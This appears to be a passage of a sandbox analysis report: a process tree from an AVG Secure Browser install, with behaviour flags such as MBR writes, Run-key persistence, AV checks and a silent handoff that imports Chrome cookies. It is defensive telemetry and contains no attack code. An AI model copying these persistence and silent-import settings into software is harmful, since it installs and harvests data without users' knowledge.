C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"8⤵
- Registers COM server for autorun
- Modifies registry class
PID:7856
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"8⤵
- Registers COM server for autorun
- Modifies registry class
PID:6308
-
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgb21haGFpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHVwZGF0ZXJ2ZXJzaW9uPSIxLjguMTY5My42IiBzaGVsbF92ZXJzaW9uPSIxLjguMTY5My42IiBpc21hY2hpbmU9IjEiIGlzX29tYWhhNjRiaXQ9IjAiIGlzX29zNjRiaXQ9IjEiIHNlc3Npb25pZD0iezA5NTE4QkY5LUE2NDYtNDBBRi04MDU3LTUyODc2RTU2QTg5QX0iIGNlcnRfZXhwX2RhdGU9IjIwMjUwOTE3IiB1c2VyaWQ9IntCRTQ0RTlDMS0xRDJFLTQzNzctODJCQi0yNUIyOEFBRUZDODR9IiB1c2VyaWRfZGF0ZT0iMjAyNDA1MjIiIG1hY2hpbmVpZD0iezAwMDA1OEQ0LUIyN0EtMDEyQi05RTNFLTQ1NDE0NzFFNkM2OX0iIG1hY2hpbmVpZF9kYXRlPSIyMDI0MDUyMiIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiB0ZXN0c291cmNlPSJhdXRvIiByZXF1ZXN0aWQ9InszOTA1NUY0NC1CREExLTQzNzYtQjBERC0wRkNGRjQ5MTMzNzd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IHBoeXNtZW1vcnk9IjgiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTUwNjMuMCIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuOC4xNjkzLjYiIGxhbmc9ImVuLVVTIiBicmFuZD0iOTIzMCIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNDg1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg7⤵PID:8064
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /handoff "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9230&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dchrome --import-cookies --auto-launch-chrome" /installsource otherinstallcmd /sessionid "{09518BF9-A646-40AF-8057-52876E56A89A}" /silent7⤵PID:2544
-
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exeAVGBrowser.exe --heartbeat --install --create-profile5⤵
- Checks computer location settings
- Adds Run key to start application
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4752 -
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ff981b3dc40,0x7ff981b3dc4c,0x7ff981b3dc586⤵PID:10192
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2128,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:26⤵PID:3292
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1740,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:36⤵PID:2972
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1888,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=2296 /prefetch:86⤵PID:7604
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3132,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=3308 /prefetch:16⤵PID:2188
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=3096 /prefetch:26⤵PID:3940
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1852,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:86⤵PID:5900
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2768,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:26⤵PID:208
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4300,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:86⤵PID:8700
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,13113452612670521463,4172505996467432307,262144 --variations-seed-version --mojo-platform-channel-handle=4616 /prefetch:86⤵PID:9068
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exeAVGBrowser.exe --silent-launch5⤵
- Adds Run key to start application
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5212 -
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ff981b3dc40,0x7ff981b3dc4c,0x7ff981b3dc586⤵PID:7416
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=1908 /prefetch:26⤵PID:8220
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:36⤵PID:9172
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1740,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=2388 /prefetch:86⤵PID:9232
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3476,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=3304 /prefetch:86⤵PID:9656
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3584,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:86⤵PID:9588
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3588,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:86⤵PID:9792
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3868,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:86⤵PID:9280
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3760,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=3768 /prefetch:86⤵PID:7728
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4000,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:86⤵PID:4384
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3880,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=3788 /prefetch:86⤵PID:6348
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3568,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:86⤵PID:7388
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3756,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:86⤵PID:7488
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3848,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:86⤵PID:8676
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4532,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4536 /prefetch:86⤵PID:10468
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:86⤵PID:4632
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:86⤵PID:10820
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4232,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5000 /prefetch:86⤵PID:2816
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3860,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5152 /prefetch:86⤵PID:10712
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5292,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:86⤵PID:8400
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:86⤵PID:5820
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5588 /prefetch:86⤵PID:9720
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5748 /prefetch:86⤵PID:10248
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5312 /prefetch:86⤵PID:10476
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4384,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:86⤵PID:8360
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:86⤵PID:10376
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6344,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:86⤵PID:11004
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6172,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6176 /prefetch:86⤵PID:10708
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5736,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6620 /prefetch:86⤵PID:8436
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6352,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6756 /prefetch:86⤵PID:8124
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6012,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:86⤵PID:208
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=7180,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=7240 /prefetch:26⤵PID:7184
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6636,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5744 /prefetch:86⤵PID:11920
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --disable-protect6⤵PID:9988
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff981b3dc40,0x7ff981b3dc4c,0x7ff981b3dc587⤵PID:10048
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6676,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:86⤵PID:8728
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1056,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:86⤵PID:6848
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=792,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=5276 /prefetch:86⤵PID:5624
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3480,i,733248043195618032,12335874283877190153,262144 --variations-seed-version --mojo-platform-channel-handle=6856 /prefetch:86⤵PID:8256
-
-
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\Installer\setup.exesetup.exe /silent --create-shortcuts=0 --install-level=1 --system-level5⤵PID:11396
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\Installer\setup.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff71b0da3f0,0x7ff71b0da3fc,0x7ff71b0da4086⤵PID:10760
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=shortcut-pin-helper /prefetch:8 startpin "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Secure Browser.lnk"6⤵PID:10780
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exeAVGBrowser.exe --check-run=src=installer5⤵
- Adds Run key to start application
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:11348 -
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xe4,0xe8,0xec,0xc0,0xf0,0x7ff981b3dc40,0x7ff981b3dc4c,0x7ff981b3dc586⤵PID:9340
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2228,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:26⤵PID:4092
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:36⤵PID:11916
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1732,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:86⤵PID:200
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2960,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=2984 /prefetch:16⤵PID:10000
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2972,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=3024 /prefetch:26⤵PID:6664
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3676,i,8348376257365222114,8988957825403314124,262144 --variations-seed-version --mojo-platform-channel-handle=3764 /prefetch:26⤵PID:11716
-
-
